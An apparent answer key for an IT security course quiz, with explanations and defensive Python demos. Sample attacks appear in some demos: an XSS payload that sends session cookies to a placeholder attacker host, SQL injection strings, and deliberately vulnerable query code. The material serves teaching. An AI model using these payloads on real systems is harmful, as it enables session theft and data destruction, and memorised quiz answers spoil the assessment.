Course 5 – IT Security: Defense Against the Digital Dark Arts

1. Which of the following are examples of injection attacks? Check all that apply.

  • SYN flood attack
  • Social engineering attack
  • SQL injection attack 
  • XSS attack 

2. An attacker could redirect your browser to a fake website login page using what kind of attack?

  • DDoS attack
  • SYN flood attack
  • Injection attack
  • DNS cache poisoning attack 

Explanation: The marked answer is DNS cache poisoning. Your browser finds a website by asking a DNS resolver for the IP address behind the hostname. If an attacker has planted a forged record in that resolver's cache, the legitimate address resolves to a server the attacker controls, and the browser lands on a fake login page even though the user typed the right URL. Phishing also leads to fake login pages, but it does so by tricking the user into following a bad link rather than by corrupting name resolution. Signs of a poisoned cache include a TLS certificate error on a site that normally has a valid certificate, or a resolver answer that disagrees with a known-good resolver (for example comparing "dig example.com" against "dig @1.1.1.1 example.com"). DNSSEC validation on the resolver is the defense against forged records.

3. A SYN flood occurs when the attacker overwhelms a server with ______.

  • ACK packets
  • SYN packets 
  • Injection attacks
  • Malware

Explanation: A SYN flood sends a server a large number of TCP SYN (synchronize) packets. Each one starts a three-way handshake that the attacker never completes, often because the source address is spoofed so the server's SYN-ACK goes nowhere. Every half-open connection occupies a slot in the listener's backlog queue until it times out, so the queue fills and the server can no longer accept handshakes from legitimate clients. SYN cookies and flood guards (rate limiting half-open connections per source) are the usual mitigations.

4. The best defense against injection attacks is to ______.

  • Use input validation 
  • Use antimalware software
  • Use a firewall
  • Use strong passwords

Explanation: The course's answer is input validation: check that untrusted input has the form the application expects (type, length, character set) before it reaches an interpreter such as SQL, a shell or an HTML page, and reject what does not match. For SQL injection specifically, the strongest single defense is parameterized queries (prepared statements), which send the SQL text and the user-supplied values to the database separately so that a value can never be parsed as code. In practice you use both: validation limits what the application accepts, and parameterization (or context-appropriate escaping) guarantees that whatever is accepted cannot change the meaning of the query. Antimalware, firewalls and strong passwords do nothing against malformed input to your own application.

5. Which of these is an example of the integrity principle that can ensure your data is accurate and untampered with?

  • Keeping a symmetric key secret
  • Implementing flood guards
  • Using MACs (Message Authentication Codes) 
  • Using Encapsulating Security Payload 

Explanation: The marked answer is MACs. A Message Authentication Code is a short tag computed over the data with a secret key (for example HMAC-SHA256). The receiver recomputes the tag with the same key and compares it; any change to the data produces a different tag, so tampering is detected. A plain hash or checksum detects accidental corruption but not deliberate tampering, because an attacker who changes the data can simply recompute the hash; the secret key in a MAC is what prevents that. Digital signatures give the same integrity guarantee using a private key, and additionally let anyone holding the public key verify. Of the other options, keeping a symmetric key secret serves confidentiality, flood guards serve availability, and Encapsulating Security Payload (ESP) is the IPsec protocol that encrypts packet payloads, so it is primarily a confidentiality mechanism.
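The following is an added example, not part of the course or this page, that shows why the secret key is what turns a hash into an integrity check. It uses only Python's standard hashlib and hmac modules; the message, the shared key and the "attacker" functions are constructed for the demonstration.

```python
import hashlib
import hmac

# Constructed sample message and shared secret (not from the course).
MESSAGE = b"transfer 100.00 to account 4471"
KEY = b"shared-secret-known-only-to-sender-and-receiver"


def hash_tag(data: bytes) -> bytes:
    """Plain SHA-256 checksum: anyone, including an attacker, can compute it."""
    return hashlib.sha256(data).digest()


def mac_tag(key: bytes, data: bytes) -> bytes:
    """HMAC-SHA256: producing a valid tag requires the secret key."""
    return hmac.new(key, data, hashlib.sha256).digest()


def receiver_checks_hash(data: bytes, tag: bytes) -> bool:
    """Integrity check with an unkeyed hash (detects accidents, not tampering)."""
    return hash_tag(data) == tag


def receiver_checks_mac(key: bytes, data: bytes, tag: bytes) -> bool:
    """Integrity check with a MAC; compare_digest avoids timing side channels."""
    return hmac.compare_digest(mac_tag(key, data), tag)


def attacker_forges_hash(data: bytes):
    """Tamper with the message and recompute the unkeyed hash; the check passes."""
    forged = data.replace(b"100.00", b"9000.00")
    return forged, hash_tag(forged)


def attacker_forges_mac(data: bytes, original_tag: bytes):
    """Tamper with the message; without the key the old tag is the best available."""
    forged = data.replace(b"100.00", b"9000.00")
    return forged, original_tag


if __name__ == "__main__":
    forged, tag = attacker_forges_hash(MESSAGE)
    print("hash accepts tampered message:", receiver_checks_hash(forged, tag))
    forged, tag = attacker_forges_mac(MESSAGE, mac_tag(KEY, MESSAGE))
    print("MAC accepts tampered message:", receiver_checks_mac(KEY, forged, tag))
```

The unkeyed check accepts the forged transfer because the attacker recomputed the hash; the MAC check rejects it because the attacker could not produce a tag for the new message. hmac.compare_digest is used instead of == so that the comparison time does not reveal how many leading bytes of a guessed tag were correct.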

6. If there are cyber threats and vulnerabilities to your system, what does that expose you to? Check all that apply.

  • Attacks 
  • The CIA triad
  • Exploits 
  • Tailgating

7. Which of these is a characteristic of Trojan malware?

  • A Trojan infection needs to be installed by the user. 
  • A Trojan may get installed without the user’s consent.
  • A Trojan is the same thing as a rootkit.
  • A Trojan is basically backdoor malware.

Explanation: A Trojan disguises itself as something legitimate or harmless (a useful utility, a game, a document) so that the user installs it voluntarily; that is what distinguishes it from a worm, which spreads on its own. Once installed it runs its real payload silently, for example stealing data, giving the attacker remote access, or installing a backdoor for further malware. A Trojan may carry a backdoor or a rootkit, but the terms are not interchangeable: "Trojan" describes how the malware gets onto the system, while "backdoor" and "rootkit" describe what it does once there.

8. What is it called when a hacker is able to get into a system through a secret entryway in order to maintain remote access to the computer?

  • Ransomware
  • Adware
  • A backdoor 
  • A Trojan

Explanation: A backdoor is a hidden way into a system that bypasses normal authentication, so that an attacker who has already compromised the machine can return later without repeating the break-in. Examples are a planted administrator account, an SSH key added to an existing account, a service listening on an unexpected port, or a modified login program. Because it is designed not to be noticed, a backdoor lets the attacker keep stealing data, launching attacks from the machine, or controlling it remotely long after the original vulnerability has been patched.

9. Which of these are ways a hacker can establish a man-in-the-middle attack? Check all that apply.

  • Tailgating
  • Rogue Access Point (AP) 
  • Evil Twin 
  • Session hijacking 

10. Which of these is where a victim connects to a network that the victim thinks is legitimate, but is really an identical network controlled by a hacker to monitor traffic?

  • A Denial of Service (DoS)
  • A logic bomb
  • DNS Cache Poisoning
  • Evil Twin 

Explanation: This is an Evil Twin attack. The hacker stands up a Wi-Fi network with the same name (SSID) and look as a legitimate one, often with a stronger signal, so that victims' devices join it instead. Once a victim is connected, all of their traffic passes through the attacker's access point, which can record it, inject content, or redirect the victim to fake login pages. The attack exploits the trust that users, and their devices' auto-join lists, place in familiar network names. Encrypting traffic end to end (TLS, a VPN) limits what the attacker can read, and forgetting open networks on the device limits automatic reconnection.

11. What is it called if a hacker takes down multiple services very quickly with the help of botnets?

  • Distributed denial-of-service (DDoS) 
  • Cross-site Scripting (XSS)
  • A password attack
  • A SQL injection

Explanation: A Distributed Denial of Service (DDoS) attack floods one or more targets with traffic from many compromised machines at once. The attacker first builds a botnet, a collection of infected devices (PCs, servers, IoT devices) that take commands from a control server, and then points all of them at the target. Because the traffic arrives from thousands of sources, blocking a single address does nothing, and the combined volume can exceed what the target's network link or upstream provider can absorb. Mitigation usually means rate limiting, filtering at the provider or a scrubbing service, and having enough capacity to ride out the flood.

12. If a hacker targets a vulnerable website by running commands that delete the website’s data in its database, what type of attack did the hacker perform?

  • A Denial-of-Service (DoS) attack
  • A dictionary attack
  • Cross-site Scripting (XSS)
  • SQL injection 

Explanation: This is SQL injection. The website takes user input (a form field, a URL parameter, a cookie) and concatenates it into a database query without validating it or separating it from the SQL code. The attacker supplies input that the database parses as additional SQL, for example a single quote that closes the intended string followed by OR '1'='1 so that a DELETE statement matches every row. Depending on what the application's database account is allowed to do, the result can be reading, altering or destroying data. Any web application that builds queries from untrusted input is exposed; parameterized queries and a least-privilege database account are the standard defenses.

13. An end-user received an email stating his bank account was compromised, and that he needs to click a link to reset his password. When the user visited the site, he recognized it as legitimate and entered his credentials which were captured by a hacker. What type of social engineering attack does this describe?

  • A baiting attack
  • A phishing attack 
  • A tailgating attack
  • A SQL injection attack

Explanation: This is phishing. The attacker sends an email that impersonates the bank and creates urgency (your account was compromised, reset your password now), and links to a lookalike site under the attacker's control. The site is built to be indistinguishable from the real login page, so the user recognizes it as legitimate and types in their credentials, which the attacker captures. Phishing is social engineering: it attacks the person rather than the software. Checking the real link target before clicking, navigating to the bank directly instead of through the email, and using multi-factor authentication (which limits what a stolen password is worth) are the practical defenses.

14. When cleaning up a system after a compromise, you should look closely for any ______ that may have been installed by the attacker.

  • Injection attacks
  • Backdoors 
  • Poisoned DNS caches
  • Rogue APs

Explanation: Look for backdoors. An attacker who has compromised a system usually leaves a way back in so that access survives a reboot, a password change or the patch that closes the original hole. When cleaning up, check for things the attacker could have planted: new or modified user accounts, especially with administrator rights; added SSH authorized keys; unfamiliar scheduled tasks, cron jobs, services or startup entries; processes listening on unexpected ports; and altered system binaries or web shells in the web root. Because a careful attacker hides these well, the safest recovery is often to rebuild the system from known-good media and restore data, rather than trusting that every backdoor was found.

15. The best defense against password attacks is using strong _______.

  • Passwords 
  • Antimalware software
  • Firewall configs
  • Encryption

Explanation: Strong passwords. A strong password is long, mixes capital and lowercase letters, numbers and symbols, and avoids names, dictionary words and anything from a list of commonly used passwords, because password attacks (dictionary and brute-force attacks) try exactly those guesses first. A password manager makes long, unique passwords for every site practical. Current guidance (NIST SP 800-63B) no longer recommends forced periodic changes; change a password when there is reason to believe it was exposed. Multi-factor authentication adds a second factor, so a password that is guessed or leaked is not enough on its own to get in.

16. A hacker stood outside a building and spun up a wireless network without anyone’s knowledge. At that point, the hacker was able to gain unauthorized access to a secure corporate network. Which of these is the name of this type of attack?

  • A Denial-of-Service (DoS) attack
  • SYN flood attack
  • A Rogue AP (Access Point) attack 
  • A DNS Cache Poisoning attack

Explanation: The marked answer is a Rogue AP. A rogue access point is any wireless access point attached to a network without the network owner's authorization; here the hacker's AP bridges into the corporate network, giving anyone who connects to it (including the hacker) a path onto a network that was supposed to be reachable only from inside the building. An Evil Twin is different: it impersonates a legitimate network's name to lure victims and spy on their traffic, but it does not by itself provide a way into the corporate network. Wireless intrusion detection (scanning for unknown SSIDs and BSSIDs), 802.1X port authentication so that an unauthorized device plugged into a switch port gets no access, and periodic site surveys are the usual controls.

17. What can occur during a ping of death (POD) attack? Check all that apply.

  • A Denial-of-Service (DoS) 
  • Remote code execution 
  • Baiting
  • A buffer overflow 

18. How can injection attacks be prevented? Check all that apply.

  • Log analysis systems
  • Input validation
  • Flood guards
  • Data sanitization 
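The example below is added to this page and is not code from the course. It illustrates questions 4, 12 and 18 together: a login query built by string formatting, the same query parameterized, an input-validation allowlist in front of it, and the question 12 scenario of a DELETE whose WHERE clause is made to match every row. It uses Python's built-in sqlite3 module with an in-memory database and constructed sample rows.

```python
import re
import sqlite3

# Allowlist for usernames: letters, digits, dot, underscore, dash, 1-32 chars.
USERNAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,32}$")


def make_db():
    """In-memory SQLite database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, pw TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "correct-horse", "admin"), ("bob", "battery-staple", "user")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, name, pw):
    """Builds the query by string formatting, so input is parsed as SQL code."""
    query = f"SELECT name, role FROM users WHERE name = '{name}' AND pw = '{pw}'"
    return conn.execute(query).fetchall()


def login_safe(conn, name, pw):
    """Parameterized query: ? placeholders are bound to values, never to code."""
    query = "SELECT name, role FROM users WHERE name = ? AND pw = ?"
    return conn.execute(query, (name, pw)).fetchall()


def login_validated(conn, name, pw):
    """Input validation in front of the parameterized query: reject odd input early."""
    if not USERNAME_RE.match(name):
        raise ValueError("username contains characters outside the allowed set")
    return login_safe(conn, name, pw)


def delete_account_vulnerable(conn, name):
    """Q12 scenario: a tautology in the name makes the WHERE clause match every row."""
    conn.execute(f"DELETE FROM users WHERE name = '{name}'")
    return conn.execute("SELECT COUNT(*) FROM users").fetchone()[0]


def delete_account_safe(conn, name):
    """Same operation with a bound parameter: only a user literally so named is removed."""
    conn.execute("DELETE FROM users WHERE name = ?", (name,))
    return conn.execute("SELECT COUNT(*) FROM users").fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    # The quote closes the string and "--" comments out the password check.
    print(login_vulnerable(db, "alice' --", "wrong"))
    print(login_safe(db, "alice' --", "wrong"))
    print(delete_account_vulnerable(make_db(), "x' OR '1'='1"))
    print(delete_account_safe(make_db(), "x' OR '1'='1"))
```

With the parameterized versions the attacker's quote and OR clause are just characters inside a value that matches no row. The allowlist is deliberately strict; it is the "input validation" answer to question 4, and it is most useful for fields that have a known shape, while parameterization is what protects free-text fields that cannot be restricted.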

19. How can you increase the strength of your passwords? Check all that apply.

  • Incorporate symbols and numbers. 
  • Exclude dictionary words. 
  • Use passwords from a precompiled list.
  • Use a mix of capital and lowercase letters. 

20. A network-based attack where one attacking machine overwhelms a target with traffic is a(n) _______ attack.

  • Denial of Service 
  • Injection
  • Malware
  • Brute force password

Explanation: Denial of Service (DoS). A DoS attack comes from a single attacking machine and tries to make a network, system or service unavailable to its intended users, either by flooding it with more traffic or connection requests than it can handle, or by sending input that crashes it (as in a ping of death). When many machines attack at the same time, usually a botnet, it is called a Distributed Denial of Service (DDoS) attack.

21. What makes a DDoS attack different from a DoS attack? Check all that apply.

  • A DDoS attack has attack traffic coming from one source.
  • A DoS attack has attack traffic coming from one source. 
  • A DoS attack has attack traffic coming from many different sources.
  • A DDoS attack has attack traffic coming from many different sources. 
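An added example for questions 20, 21 and 25 (not from the course) that runs simple detection logic over a constructed connection log. It counts TCP SYN packets per time window and labels a window DoS when the volume comes from a handful of sources and DDoS when the same volume is spread across many. The log format, the addresses and the thresholds are assumptions for the demo.

```python
from collections import Counter, defaultdict


def build_sample_log():
    """Constructed connection log: '<seconds> <src_ip> <dst_ip>:<port> <flags>'.

    Three phases against one web server: normal traffic, a flood from a single
    source (DoS), and a flood of the same size spread over 200 sources (DDoS).
    """
    lines = []
    for t in range(0, 10):                       # baseline: 5 clients, 1 SYN/s each
        for i in range(5):
            lines.append(f"{t} 192.0.2.{i + 1} 198.51.100.10:443 S")
    for t in range(10, 20):                      # DoS: one source, 20 SYN/s
        for _ in range(20):
            lines.append(f"{t} 203.0.113.7 198.51.100.10:443 S")
    for t in range(20, 30):                      # DDoS: 200 sources, 1 SYN each
        for i in range(20):
            n = (t - 20) * 20 + i
            lines.append(f"{t} 100.64.{n // 256}.{n % 256} 198.51.100.10:443 S")
    return lines


def syn_counts_per_window(lines, window=10):
    """Count SYN-only packets per source within fixed-length time windows."""
    windows = defaultdict(Counter)
    for line in lines:
        ts, src, _dst, flags = line.split()
        if flags == "S":                         # SYN without ACK: new handshake attempt
            start = int(ts) // window * window
            windows[start][src] += 1
    return windows


def classify(lines, window=10, syn_threshold=100, source_threshold=10):
    """Label each window normal / DoS / DDoS from volume and source spread."""
    results = []
    for start, per_src in sorted(syn_counts_per_window(lines, window).items()):
        total = sum(per_src.values())
        if total < syn_threshold:
            label = "normal"
        elif len(per_src) < source_threshold:
            label = "DoS"                        # block the few offending addresses
        else:
            label = "DDoS"                       # per-address blocking will not help
        results.append((start, total, len(per_src), label))
    return results


if __name__ == "__main__":
    for row in classify(build_sample_log()):
        print(row)
```

The two flood windows carry the same number of SYNs; the only thing that separates them is how many distinct sources sent them, which is also what decides the response: a single-source flood can be dropped at the firewall, while a distributed one needs rate limiting or upstream filtering.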

22. Which of these is an example of the confidentiality principle that can help keep your data hidden from unwanted eyes?

  • Making sure the data hasn’t been tampered with 
  • Preventing an unwanted download
  • Preventing data loss
  • Protecting online accounts with password protection

Explanation: Confidentiality means keeping data from being read by anyone who is not authorized to see it. Of the options, preventing an unwanted download is the one that belongs to confidentiality: it stops the data from leaving in the first place. Making sure data has not been tampered with is the integrity principle, and preventing data loss is availability. Encryption is the classic confidentiality mechanism: the data is transformed so that only a holder of the key can read it, so even a copy that does leak is useless to the attacker.

23. What’s the difference between a virus and a worm?

  • Viruses replicate through files, but worms live on their own. 
  • Viruses do not replicate like worms do.
  • Worms replicate, viruses do not.
  • Worms replicate through files, but viruses live on their own.

24. A hacker infected your computer to steal your Internet connection and used your machine’s resources to mine Bitcoin. What is the name of this kind of attack?

  • Ransomware
  • Adware
  • A bot 
  • Spyware

Explanation: The marked answer is a bot. The hacker's malware turned your computer into a bot: a machine under remote control that performs work for the attacker, in this case using your CPU, electricity and Internet connection to mine Bitcoin. Many such machines together form a botnet. Silently stealing computing resources to mine cryptocurrency is usually called cryptojacking, so this is a bot whose job is cryptojacking. Ransomware encrypts files for extortion, adware shows unwanted advertisements, and spyware collects information, none of which matches the description.

25. Which of these sends tons of packets to a system in order to crash it or prevents services from being available? Check all that apply.

  • SYN flood 
  • Ping flood 
  • An Evil Twin
  • Ping of Death (POD)

26. You receive a legitimate-looking email from a sender that you recognize asking you to click a funny link. But, once you do, malware installs on your computer. What is most likely the reason you got infected?

  • The sender’s email has been hacked.
  • The sender’s email password was cracked.
  • The sender’s email address was spoofed. 
  • The sender’s email password was used in a DNS Cache Poisoning attack.

Explanation: The sender's address was most likely spoofed. The From: header of an email is just text set by whoever sends the message, and SMTP does not verify it, so an attacker can put a name and address you recognize on a message that never touched the sender's account. Nothing in the scenario requires that the sender's mailbox was hacked or their password cracked; spoofing is simpler and far more common. The link then led to a site that installed malware, which is the phishing part of the attack.

Spoofing works because recipients trust a familiar name. Mail systems counter it with SPF, DKIM and DMARC, which let the receiving server check whether the message really came from a server authorized for the claimed domain; the result is recorded in the Authentication-Results header. For the user, the practical check is to be suspicious of unexpected links even from known senders and to confirm through another channel before clicking.

27. Which of these is a way to help prevent brute-force attacks? Check all that apply.

  • Strong passwords 
  • Password crackers
  • Using a precompiled list of common passwords
  • Captchas 
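An added example for questions 19 and 27 (not part of the course) that applies the page's own rules in code: a checker that reports why a password is weak, and an account lockout that makes online brute forcing impractical. The common-password and dictionary lists are tiny constructed stand-ins for the real corpora a deployment would use, and the lockout limits are assumptions.

```python
import time

# Constructed lists; real deployments use large breach corpora and dictionaries.
COMMON_PASSWORDS = {"password", "123456", "qwerty", "letmein", "welcome1"}
DICTIONARY_WORDS = {"summer", "dragon", "monkey", "football", "welcome"}


def password_problems(pw):
    """Return the reasons a password is weak; an empty list means it passes."""
    problems = []
    if len(pw) < 12:
        problems.append("shorter than 12 characters")
    if not any(c.islower() for c in pw):
        problems.append("no lowercase letter")
    if not any(c.isupper() for c in pw):
        problems.append("no capital letter")
    if not any(c.isdigit() for c in pw):
        problems.append("no number")
    if not any(not c.isalnum() for c in pw):
        problems.append("no symbol")
    lowered = pw.lower()
    if lowered in COMMON_PASSWORDS:
        problems.append("appears in a common-password list")
    if any(word in lowered for word in DICTIONARY_WORDS):
        problems.append("contains a dictionary word")
    return problems


class LoginThrottle:
    """Lock an account after repeated failures so online brute force stalls."""

    def __init__(self, max_failures=5, lockout_seconds=900, clock=time.monotonic):
        self.max_failures = max_failures
        self.lockout_seconds = lockout_seconds
        self.clock = clock                  # injectable so tests need not sleep
        self.failures = {}                  # user -> consecutive failures
        self.locked_until = {}              # user -> time the lockout ends

    def attempt(self, user, password_correct):
        """Return 'ok', 'denied' or 'locked' for one login attempt."""
        now = self.clock()
        if self.locked_until.get(user, 0.0) > now:
            return "locked"                 # refuse even a correct password
        if password_correct:
            self.failures.pop(user, None)
            return "ok"
        self.failures[user] = self.failures.get(user, 0) + 1
        if self.failures[user] >= self.max_failures:
            self.locked_until[user] = now + self.lockout_seconds
            self.failures.pop(user, None)
            return "locked"
        return "denied"


if __name__ == "__main__":
    print(password_problems("qwerty"))
    print(password_problems("Tr0ub4dor&3xplorer!"))
    throttle = LoginThrottle(max_failures=3, lockout_seconds=60)
    for guess_ok in (False, False, False, True):
        print(throttle.attempt("bob", guess_ok))
```

The lockout refuses even the correct password while it is active, which is the point: an attacker who guesses the right password on the fourth try still gets "locked". A CAPTCHA serves the same goal by a different route, making each attempt cost human effort rather than adding a delay.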

28. A(n) _____ attack is meant to prevent legitimate traffic from reaching a service.

  • Password
  • DNS Cache poisoning
  • Injection
  • Denial of Service 

Explanation: Denial of Service. A DoS attack does not steal or alter anything; its purpose is to make a service unavailable by exhausting the resources legitimate traffic needs (bandwidth, connection slots, CPU) or by crashing the service outright.

29. Which of these is true of vulnerabilities? Check all that apply.

  • A vulnerability is a flaw in the code of an application that can be exploited. 
  • An exploit is the possibility of taking advantage of a vulnerability bug in code.
  • A vulnerability is the possibility of suffering a loss in the event of an attack.
  • An exploit takes advantage of bugs and vulnerabilities. 

30. What type of attack can a hacker perform that involves injecting malicious code into a website to hijack a session cookie?

  • A password attack
  • Cross-site Scripting (XSS) 
  • Ping flood
  • SQL injection

Explanation: This is Cross-site Scripting (XSS). A website that reflects or stores user-supplied text and renders it into its pages without encoding it lets an attacker inject JavaScript that runs in other visitors' browsers with the same access to the page as the site's own scripts. A common payload reads the session cookie (document.cookie) and sends it to the attacker, who can then present that cookie to the site and be treated as the logged-in victim. That second step is the session hijacking; XSS is how the cookie was obtained.

The defenses are output encoding of untrusted data for the context it is inserted into, a Content Security Policy that blocks inline scripts, and marking the session cookie HttpOnly so that script cannot read it at all. The Secure and SameSite cookie attributes, and serving the site over HTTPS, close other ways of capturing the cookie.
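An added example (not from the course) showing the two defenses in code: the same attacker-supplied comment rendered with and without HTML encoding, and the Set-Cookie header for a session ID with HttpOnly set so that an injected script cannot read the cookie. It uses only Python's standard html and http.cookies modules; the payload and the attacker hostname are constructed for the demo.

```python
import html
from http.cookies import SimpleCookie

# Constructed attacker input: a "comment" that tries to exfiltrate the session cookie.
PAYLOAD = "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>"


def render_vulnerable(comment):
    """Interpolates user text straight into HTML, so the browser executes it."""
    return f'<div class="comment">{comment}</div>'


def render_safe(comment):
    """HTML-encodes the text: < > & " ' become entities and stay inert text."""
    return f'<div class="comment">{html.escape(comment, quote=True)}</div>'


def has_script_tag(page):
    """Crude marker for 'the browser would run script here' in the two renderings."""
    return "<script" in page.lower()


def session_set_cookie(session_id, http_only=True):
    """Build the Set-Cookie header for a session ID.

    HttpOnly keeps the cookie out of document.cookie, so even a successful XSS
    payload cannot read it; Secure and SameSite limit other capture paths.
    """
    c = SimpleCookie()
    c["session"] = session_id
    c["session"]["httponly"] = http_only
    c["session"]["secure"] = True
    c["session"]["samesite"] = "Lax"
    return c.output(header="Set-Cookie:").strip()


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print(render_safe(PAYLOAD))
    print(session_set_cookie("constructed-session-id"))
```

Encoding is context-specific: html.escape is right for text between tags and inside quoted attributes, but data placed inside a script block, a URL or a CSS value needs the encoding for that context instead. HttpOnly does not stop XSS itself; it only takes the cookie off the table, so the attacker's script could still act on the user's behalf within the page.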

31. Phishing, baiting, and tailgating are examples of ________ attacks.

  • Password
  • Malware
  • Social engineering 
  • Network

32. An attack that would allow someone to intercept your data as it’s being sent or received is called a(n) _________ attack.

  • SYN flood
  • Denial of Service
  • Man-in-the-middle 
  • Injection

Explanation: Man-in-the-middle (MitM). The attacker positions themselves between two communicating parties and relays the traffic, so that both sides believe they are talking directly to each other while the attacker reads or modifies everything that passes. On a network this is done with techniques such as ARP spoofing, DNS cache poisoning, rogue or evil-twin access points, or session hijacking. Because the attacker sees the data in transit, both confidentiality and integrity are at risk. The defense is to authenticate the endpoint and encrypt the channel: TLS with certificate validation, a VPN, SSH host-key checking, and refusing to proceed past certificate warnings.

33. If a hacker can steal your passwords by installing malware that captures all the messages you type, what kind of malware did the hacker install? Check all that apply.

  • A logic bomb
  • A rootkit
  • A keylogger 
  • Spyware 
